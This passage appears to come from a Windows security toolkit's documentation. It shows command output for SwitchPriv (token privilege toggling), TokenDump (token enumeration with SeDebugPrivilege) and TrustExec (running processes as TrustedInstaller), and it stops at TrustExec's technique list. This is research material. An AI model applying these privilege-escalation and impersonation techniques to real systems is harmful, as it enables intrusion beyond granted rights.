SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\dev>SwitchPriv.exe -e timezone

[>] Trying to enable SeTimeZonePrivilege.
    [*] Target PID   : 9468
    [*] Process Name : cmd
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.


C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Enabled

C:\dev>SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9468
    [*] Process Name : cmd
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

To remove privilege, use --remove option as follows:

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Enabled

C:\dev>SwitchPriv.exe -r timezone

[>] Trying to remove SeTimeZonePrivilege.
    [*] Target PID   : 9788
    [*] Process Name : cmd
[+] SeTimeZonePrivilege is removed successfully.
[*] Done.


C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

To enable, disable or remove all available token privileges, specify all as the value for --enable, --disable or --remove option:

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

C:\dev>SwitchPriv.exe -e all

[>] Trying to enable all token privileges.
    [*] Target PID   : 9788
    [*] Process Name : cmd
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.


C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled

To find process have a specific privilege, use --find option as follows:

C:\dev>SwitchPriv.exe -f createtoken

[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
    [*] csrss (PID : 800)
    [*] smss (PID : 660)
    [*] lsass (PID : 1088)
    [*] Memory Compression (PID : 3600)
    [*] csrss (PID : 868)
[*] Access is denied by following 2 process(es).
    [*] System (PID : 4)
    [*] Idle (PID : 0)
[*] Done.


C:\dev>SwitchPriv.exe -g -p 800

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 800
    [*] Process Name : csrss
[+] Got 30 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeCreateTokenPrivilege                    Disabled
SeAssignPrimaryTokenPrivilege             Disabled
SeLockMemoryPrivilege                     EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege                  Disabled
SeTcbPrivilege                            EnabledByDefault, Enabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  EnabledByDefault, Enabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
SeCreatePermanentPrivilege                EnabledByDefault, Enabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          EnabledByDefault, Enabled
SeAuditPrivilege                          EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeRelabelPrivilege                        Disabled
SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
SeTimeZonePrivilege                       EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled

[*] Integrity Level : System Mandatory Level
[*] Done.

If you want to set integrity level, use --integrity option as follows:

C:\dev>whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


C:\dev>SwitchPriv.exe -i 1

[>] Trying to set integrity level.
    |-> Target PID   : 5144
    |-> Process Name : cmd
[>] Trying to set LOW_MANDATORY_LEVEL.
[+] LOW_MANDATORY_LEVEL is set successfully.

C:\dev>whoami /groups | findstr /i level
Mandatory Label\Low Mandatory Level                           Label            S-1-16-4096

TokenDump

Back to Top

Project

This tool is a utility to inspect token information:

C:\Dev>.\TokenDump.exe -h

TokenDump - Tool to dump processs token information.

Usage: TokenDump.exe [Options]

        -h, --help    : Displays this help message.
        -d, --debug   : Flag to enable SeDebugPrivilege.
        -e, --enum    : Flag to enumerate brief information tokens for processes or handles.
        -T, --thread  : Flag to scan thead tokens. Use with -e option.
        -H, --handle  : Flag to scan token handles. Use with -e option.
        -s, --scan    : Flag to get verbose information for a specific process, thread or handle.
        -a, --account : Specifies account name filter string. Use with -e flag.
        -p, --pid     : Specifies a target PID in decimal format. Use with -s flag.
        -t, --tid     : Specifies a target TID in decimal format. Use with -s flag and -p option.
        -v, --value   : Specifies a token handle value in hex format. Use with -s flag and -p option.

To enumerate token for all processes, just set -e flag:

C:\Dev>.\TokenDump.exe -e

[>] Trying to enumerate process token.

 PID Process Name                Token User                   Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3016 sihost.exe                  X64DEV\user                  Medium    False      False
 860 fontdrvhost.exe             Font Driver Host\UMFD-0      Low       False      True
 428 msedgewebview2.exe          X64DEV\user                  Low       True       False

--snip--

5612 Widgets.exe                 X64DEV\user                  Medium    False      False
2588 svchost.exe                 NT AUTHORITY\LOCAL SERVICE   System    False      False
9052 RuntimeBroker.exe           X64DEV\user                  Medium    False      False

[+] Got 157 token information.
[*] Found 7 account(s).
    [*] X64DEV\user
    [*] Font Driver Host\UMFD-0
    [*] NT AUTHORITY\SYSTEM
    [*] NT AUTHORITY\LOCAL SERVICE
    [*] Font Driver Host\UMFD-1
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
[*] Done.

If you want to enable SeDebugPrivilege, set -d flag as follows:

C:\Dev>.\TokenDump.exe -e -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.

 PID Process Name                Token User                   Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3544 svchost.exe                 NT AUTHORITY\SYSTEM          System    False      False
6944 WmiPrvSE.exe                NT AUTHORITY\SYSTEM          System    False      False
3188 SystemInformer.exe          X64DEV\user                  Medium    False      False
7608 sppsvc.exe                  NT AUTHORITY\NETWORK SERVICE System    False      False
6948 SecurityHealthSystray.exe   X64DEV\user                  Medium    False      False
7228 svchost.exe                 X64DEV\user                  Medium    False      False

--snip--

When set -H flag with -e flag, TokenDump tries to enumerate Token handles information:

C:\Dev>.\TokenDump.exe -e -H

[>] Trying to enumerate token handles.

[Token Handle(s) - svchost.exe (PID: 2808)]

Handle Token User  Integrity Restricted AppContainer Token Type    Impersonation Level
====== =========== ========= ========== ============ ============= ===================
 0x4AC X64DEV\user Medium    False      False        Primary       Anonymous
 0x50C X64DEV\user Medium    False      False        Primary       Anonymous
 0x510 X64DEV\user Medium    False      False        Primary       Anonymous
 0x514 X64DEV\user Medium    False      False        Primary       Anonymous

--snip--

[Token Handle(s) - msedgewebview2.exe (PID: 9804)]

Handle Token User  Integrity Restricted AppContainer Token Type    Impersonation Level
====== =========== ========= ========== ============ ============= ===================
 0x7D4 X64DEV\user Low       True       False        Impersonation Impersonation
 0x7D8 X64DEV\user Low       True       False        Primary       Anonymous
 0xBCC X64DEV\user Low       True       False        Impersonation Impersonation
 0xBDC X64DEV\user Low       True       False        Primary       Anonymous
 0xCF8 X64DEV\user Low       True       False        Impersonation Impersonation
 0xD00 X64DEV\user Low       True       False        Primary       Anonymous

[+] Got 910 handle(s).
[*] Found 7 account(s).
    [*] NT AUTHORITY\SYSTEM
    [*] X64DEV\user
    [*] NT AUTHORITY\LOCAL SERVICE
    [*] Font Driver Host\UMFD-1
    [*] Font Driver Host\UMFD-0
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
[*] Done.

To enumerate impersonated thread token, set -T flag as well as -e flag as follows:

C:\Dev>.\TokenDump.exe -e -T

[>] Trying to enumerate thread tokens.

 PID  TID Process Name      Token User          Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
6552 5668 TokenStealing.exe NT AUTHORITY\SYSTEM System    Impersonation

[+] Got 1 handle(s).
[*] Found 1 account(s).
    [*] NT AUTHORITY\SYSTEM
[*] Done.

If you want to filter these results with token username, set filter string as -a option value as follows:

C:\Dev>.\TokenDump.exe -e -a network -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.

 PID Process Name Token User                   Integrity Restricted AppContainer
==== ============ ============================ ========= ========== ============
3404 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
4656 msdtc.exe    NT AUTHORITY\NETWORK SERVICE System    False      False
1628 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
2916 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
2464 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
4592 WmiPrvSE.exe NT AUTHORITY\NETWORK SERVICE System    False      False
7840 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
7408 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False
 940 svchost.exe  NT AUTHORITY\NETWORK SERVICE System    False      False

[+] Got 9 token information.
[*] Found 7 account(s).
    [*] X64DEV\user
    [*] Font Driver Host\UMFD-0
    [*] NT AUTHORITY\SYSTEM
    [*] NT AUTHORITY\LOCAL SERVICE
    [*] Font Driver Host\UMFD-1
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
[*] Done.

C:\Dev>.\TokenDump.exe -e -a network -H -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.

[Token Handle(s) - lsass.exe (PID: 704)]

Handle Token User                   Integrity Restricted AppContainer Token Type    Impersonation Level
====== ============================ ========= ========== ============ ============= ===================
 0x8C4 NT AUTHORITY\NETWORK SERVICE System    False      False        Impersonation Impersonation

--snip--

[Token Handle(s) - svchost.exe (PID: 7408)]

Handle Token User                   Integrity Restricted AppContainer Token Type Impersonation Level
====== ============================ ========= ========== ============ ========== ===================
  0xB0 NT AUTHORITY\NETWORK SERVICE System    False      False        Primary    Anonymous

[+] Got 29 handle(s).
[*] Found 7 account(s).
    [*] NT AUTHORITY\SYSTEM
    [*] X64DEV\user
    [*] Font Driver Host\UMFD-0
    [*] Font Driver Host\UMFD-1
    [*] NT AUTHORITY\NETWORK SERVICE
    [*] Window Manager\DWM-1
    [*] NT AUTHORITY\LOCAL SERVICE
[*] Done.

To get verbose information for a specific process, set -s flag and target PID as -p option value:

C:\Dev>.\TokenDump.exe -s -p 5520

[>] Trying to dump process token information.

[Token Information for ShellExperienceHost.exe (PID: 5520)]

ImageFilePath       : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
CommandLine         : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Token User          : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner         : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Primary Group       : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type          : Primary
Impersonation Level : Anonymous
Token ID            : 0x00000000002FCAC9
Authentication ID   : 0x000000000001E809
Original ID         : 0x00000000000003E7
Modified ID         : 0x00000000002FCAB9
Integrity Level     : Low
Session ID          : 1
Elevation Type      : Limited
Elevated            : False
Restricted          : False
AppContainer        : True
AppContainer Name   : microsoft.windows.shellexperiencehost_cw5n1h2txyewy
AppContainer SID    : S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708
AppContainer Number : 6
Has Linked Token    : True
Token Source        : User32
Token Source ID     : 0x000000000001E500

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                State
    ============================= =========================
    SeChangeNotifyPrivilege       EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege Disabled


    GROUP INFORMATION
    -----------------

    Group Name                                                    Attributes
    ============================================================= =============================================
    X64DEV\None                                                   Mandatory, EnabledByDefault, Enabled
    Everyone                                                      Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account and member of Administrators group UseForDenyOnly
    BUILTIN\Administrators                                        UseForDenyOnly
    BUILTIN\Users                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\INTERACTIVE                                      Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users                              Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization                                Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account                                    Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\LogonSessionId_0_124092                          Mandatory, EnabledByDefault, Enabled, LogonId
    LOCAL                                                         Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\NTLM Authentication                              Mandatory, EnabledByDefault, Enabled
    Mandatory Label\Low Mandatory Level                           Integrity, IntegrityEnabled


    APPCONTAINER CAPABILITIES
    -------------------------

    Capability Name                                                                  Flags
    ================================================================================ =======
    NAMED CAPABILITIES\GlobalMediaControl                                            Enabled
    APPLICATION PACKAGE AUTHORITY\Software and hardware certificates or a smart card Enabled
    NAMED CAPABILITIES\RemoteSystem                                                  Enabled
    APPLICATION PACKAGE AUTHORITY\Your pictures library                              Enabled
    NAMED CAPABILITIES\ActivitySystem                                                Enabled
    NAMED CAPABILITIES\BluetoothDeviceSettings                                       Enabled
    NAMED CAPABILITIES\PackageQuery                                                  Enabled
    NAMED CAPABILITIES\CellularDeviceControl                                         Enabled
    NAMED CAPABILITIES\CellularDeviceIdentity                                        Enabled
    NAMED CAPABILITIES\NetworkDeviceSettings                                         Enabled
    NAMED CAPABILITIES\AppointmentsSystem                                            Enabled
    NAMED CAPABILITIES\EnterpriseCloudSSO                                            Enabled
    NAMED CAPABILITIES\ChatSystem                                                    Enabled
    NAMED CAPABILITIES\ContactsSystem                                                Enabled
    NAMED CAPABILITIES\EmailSystem                                                   Enabled
    NAMED CAPABILITIES\PhoneCallHistorySystem                                        Enabled
    NAMED CAPABILITIES\InputInjection                                                Enabled
    NAMED CAPABILITIES\UserDataAccountSetup                                          Enabled
    NAMED CAPABILITIES\UserWebAccounts                                               Enabled
    NAMED CAPABILITIES\ShellExperience                                               Enabled
    NAMED CAPABILITIES\CloudStore                                                    Enabled
    NAMED CAPABILITIES\CortanaSettings                                               Enabled
    NAMED CAPABILITIES\PackageContents                                               Enabled
    NAMED CAPABILITIES\TargetedContent                                               Enabled
    NAMED CAPABILITIES\UserAccountInformation                                        Enabled
    APPLICATION PACKAGE AUTHORITY\Your Internet connection                           Enabled
    NAMED CAPABILITIES\Location                                                      Enabled
    NAMED CAPABILITIES\VisualElementsSystem                                          Enabled
    NAMED CAPABILITIES\ActivityData                                                  Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Radios                                                        Enabled
    NAMED CAPABILITIES\WiFiControl                                                   Enabled
    NAMED CAPABILITIES\CellularData                                                  Enabled
    NAMED CAPABILITIES\WifiData                                                      Enabled
    NAMED CAPABILITIES\BluetoothAdapter                                              Enabled
    NAMED CAPABILITIES\BluetoothSync                                                 Enabled
    PACKAGE CAPABILITY\microsoft.windows.shellexperiencehost_cw5n1h2txyewy           Enabled
    NAMED CAPABILITIES\AccessoryManager                                              Enabled
    NAMED CAPABILITIES\AccessoryManager                                              Enabled
    NAMED CAPABILITIES\Contacts                                                      Enabled
    NAMED CAPABILITIES\Email                                                         Enabled
    NAMED CAPABILITIES\PhoneCallHistory                                              Enabled
    NAMED CAPABILITIES\UserAccountInformation                                        Enabled
    NAMED CAPABILITIES\ID_CAP_LOCATION                                               Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Radios                                                        Enabled
    NAMED CAPABILITIES\WiFiControl                                                   Enabled


    DACL INFORMATION
    ----------------

    Account Name                                        Access                      Flags Type
    =================================================== =========================== ===== =============
    X64DEV\user                                         GenericAll                  None  AccessAllowed
    NT AUTHORITY\SYSTEM                                 GenericAll                  None  AccessAllowed
    NT AUTHORITY\LogonSessionId_0_124092                GenericExecute, GenericRead None  AccessAllowed
    microsoft.windows.shellexperiencehost_cw5n1h2txyewy GenericAll                  None  AccessAllowed



[Linked Token Information for ShellExperienceHost.exe (PID: 5520)]

Token User          : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner         : BUILTIN\Administrators (SID: S-1-5-32-544)
Primary Group       : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type          : Impersonation
Impersonation Level : Identification
Token ID            : 0x0000000000E9BC5F
Authentication ID   : 0x000000000001E798
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000001E808
Integrity Level     : High
Session ID          : 1
Elevation Type      : Full
Elevated            : True
Restricted          : False
AppContainer        : False
Token Source        : User32
Token Source ID     : 0x000000000001E500

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                            State
    ========================================= =========================
    SeIncreaseQuotaPrivilege                  Disabled
    SeSecurityPrivilege                       Disabled
    SeTakeOwnershipPrivilege                  Disabled
    SeLoadDriverPrivilege                     Disabled
    SeSystemProfilePrivilege                  Disabled
    SeSystemtimePrivilege                     Disabled
    SeProfileSingleProcessPrivilege           Disabled
    SeIncreaseBasePriorityPrivilege           Disabled
    SeCreatePagefilePrivilege                 Disabled
    SeBackupPrivilege                         Disabled
    SeRestorePrivilege                        Disabled
    SeShutdownPrivilege                       Disabled
    SeDebugPrivilege                          Disabled
    SeSystemEnvironmentPrivilege              Disabled
    SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
    SeRemoteShutdownPrivilege                 Disabled
    SeUndockPrivilege                         Disabled
    SeManageVolumePrivilege                   Disabled
    SeImpersonatePrivilege                    EnabledByDefault, Enabled
    SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege             Disabled
    SeTimeZonePrivilege                       Disabled
    SeCreateSymbolicLinkPrivilege             Disabled
    SeDelegateSessionUserImpersonatePrivilege Disabled


    GROUP INFORMATION
    -----------------

    Group Name                                                    Attributes
    ============================================================= =============================================
    X64DEV\None                                                   Mandatory, EnabledByDefault, Enabled
    Everyone                                                      Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled
    BUILTIN\Administrators                                        Mandatory, EnabledByDefault, Enabled, Owner
    BUILTIN\Users                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\INTERACTIVE                                      Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users                              Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization                                Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account                                    Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\LogonSessionId_0_124092                          Mandatory, EnabledByDefault, Enabled, LogonId
    LOCAL                                                         Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\NTLM Authentication                              Mandatory, EnabledByDefault, Enabled
    Mandatory Label\High Mandatory Level                          Integrity, IntegrityEnabled


    DACL INFORMATION
    ----------------

    Account Name                         Access                      Flags Type
    ==================================== =========================== ===== =============
    BUILTIN\Administrators               GenericAll                  None  AccessAllowed
    NT AUTHORITY\SYSTEM                  GenericAll                  None  AccessAllowed
    NT AUTHORITY\LogonSessionId_0_124092 GenericExecute, GenericRead None  AccessAllowed


[*] Done.

If you set handle value in a specific process as -v option and the PID as -p option as well as -s flag, this tool get verbose information for the handle as follows:

C:\Dev>.\TokenDump.exe -s -p 8828 -v 0x428 -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.

[Token Information for Handle 0x428 of svchost.exe (PID: 8828)]

Token User          : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Owner         : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Primary Group       : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Type          : Impersonation
Impersonation Level : Impersonation
Token ID            : 0x000000000119F79B
Authentication ID   : 0x00000000000003E5
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000119F79D
Integrity Level     : System
Session ID          : 0
Elevation Type      : Default
Elevated            : True
Restricted          : False
AppContainer        : False
Has Linked Token    : False
Token Source        : Advapi
Token Source ID     : 0x000000000006C1EC

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name          State
    ======================= =========================
    SeChangeNotifyPrivilege EnabledByDefault, Enabled
    SeImpersonatePrivilege  EnabledByDefault, Enabled


    GROUP INFORMATION
    -----------------

    Group Name                             Attributes
    ====================================== ====================================================
    Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
    Everyone                               Mandatory, EnabledByDefault, Enabled
    BUILTIN\Users                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\SERVICE                   Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users       Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization         Mandatory, EnabledByDefault, Enabled
    NT SERVICE\LicenseManager              EnabledByDefault, Enabled, Owner
    NT AUTHORITY\LogonSessionId_0_442859   Mandatory, EnabledByDefault, Enabled, Owner, LogonId
    LOCAL                                  Mandatory, EnabledByDefault, Enabled


    DACL INFORMATION
    ----------------

    Account Name              Access      Flags Type
    ========================= =========== ===== =============
    NT AUTHORITY\SYSTEM       GenericAll  None  AccessAllowed
    OWNER RIGHTS              ReadControl None  AccessAllowed
    NT SERVICE\LicenseManager GenericAll  None  AccessAllowed


[*] Done.

To investigate impersonate token applied to thread, set the thread ID as -t option as follows:

C:\Dev>.\TokenDump.exe -e -T -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate thread tokens.

 PID  TID Process Name      Token User          Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
2052 6768 svchost.exe       NT AUTHORITY\SYSTEM System    Impersonation
3416 2068 svchost.exe       NT AUTHORITY\SYSTEM System    Impersonation
3416 4168 svchost.exe       NT AUTHORITY\SYSTEM System    Impersonation
2864 8696 TokenStealing.exe NT AUTHORITY\SYSTEM System    Impersonation
4936 4848 TiWorker.exe      NT AUTHORITY\SYSTEM System    Impersonation

[+] Got 5 handle(s).
[*] Found 1 account(s).
    [*] NT AUTHORITY\SYSTEM
[*] Done.


C:\Dev>.\TokenDump.exe -s -p 4936 -t 4848 -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.

[Token Information for TiWorker.exe (PID: 4936, TID: 4848)]

Token User          : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Owner         : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Primary Group       : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Type          : Impersonation
Impersonation Level : Impersonation
Token ID            : 0x00000000010C7342
Authentication ID   : 0x00000000000003E7
Original ID         : 0x00000000000003E7
Modified ID         : 0x0000000000F9368D
Integrity Level     : System
Session ID          : 0
Elevation Type      : Default
Elevated            : True
Restricted          : False
AppContainer        : False
Has Linked Token    : False
Token Source        : N/A
Token Source ID     : N/A

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                            State
    ========================================= =========================
    SeAssignPrimaryTokenPrivilege             Disabled
    SeLockMemoryPrivilege                     EnabledByDefault, Enabled
    SeIncreaseQuotaPrivilege                  Disabled
    SeTcbPrivilege                            EnabledByDefault, Enabled
    SeSecurityPrivilege                       Enabled
    SeTakeOwnershipPrivilege                  Disabled
    SeLoadDriverPrivilege                     Disabled
    SeSystemProfilePrivilege                  EnabledByDefault, Enabled
    SeSystemtimePrivilege                     Disabled
    SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
    SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
    SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
    SeCreatePermanentPrivilege                EnabledByDefault, Enabled
    SeBackupPrivilege                         Enabled
    SeRestorePrivilege                        Enabled
    SeShutdownPrivilege                       Disabled
    SeDebugPrivilege                          EnabledByDefault, Enabled
    SeAuditPrivilege                          EnabledByDefault, Enabled
    SeSystemEnvironmentPrivilege              Disabled
    SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
    SeUndockPrivilege                         Disabled
    SeManageVolumePrivilege                   Disabled
    SeImpersonatePrivilege                    EnabledByDefault, Enabled
    SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
    SeTimeZonePrivilege                       EnabledByDefault, Enabled
    SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
    SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled


    GROUP INFORMATION
    -----------------

    Group Name                             Attributes
    ====================================== ====================================================
    Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
    Everyone                               Mandatory, EnabledByDefault, Enabled
    BUILTIN\Users                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\SERVICE                   Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users       Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization         Mandatory, EnabledByDefault, Enabled
    NT SERVICE\TrustedInstaller            EnabledByDefault, Enabled, Owner
    NT AUTHORITY\LogonSessionId_0_14288153 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
    LOCAL                                  Mandatory, EnabledByDefault, Enabled
    BUILTIN\Administrators                 EnabledByDefault, Enabled, Owner


    DACL INFORMATION
    ----------------

    Account Name                Access      Flags Type
    =========================== =========== ===== =============
    NT AUTHORITY\SYSTEM         GenericAll  None  AccessAllowed
    OWNER RIGHTS                ReadControl None  AccessAllowed
    NT SERVICE\TrustedInstaller GenericAll  None  AccessAllowed


[*] Done.

TrustExec

Back to Top

Project

This tool is to execute process as NT SERVICE\TrustedInstaller group account. Original PoC is Grzegorz Tworek's TrustedInstallerCmd2.c. I ported it to C# and rebuilt it as a tool. Most of operations require administrative privilege (SeDebugPrivilege, SeImpersonatePrivilege and High Mandatory Level):

C:\dev>TrustExec.exe

TrustExec - Tool to investigate TrustedInstaller capability.

Usage: TrustExec.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

    + exec - Run process as "NT SERVICE\TrustedInstaller".
    + sid  - Add or remove virtual account's SID.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

exec Module

This module is to execute process as TrustedInstaller group account:

C:\dev>TrustExec.exe -m exec -h

TrustExec - Help for "exec" command.

Usage: TrustExec.exe -m exec [Options]

        -h, --help      : Displays this help message.
        -s, --shell     : Flag for interactive shell.
        -f, --full      : Flag to enable all available privileges.
        -t, --technique : Specifies technique ID. Default ID is 0.
        -c, --command   : Specifies command to execute.
        -d, --domain    : Specifies domain name to add. Default value is "DefaultDomain".
        -u, --username  : Specifies username to add. Default value is "DefaultUser".
        -i, --id        : Specifies RID for virtual domain. Default value is "110".
        -e, --extra     : Specifies extra group SID(s) to add.

Available Technique IDs:

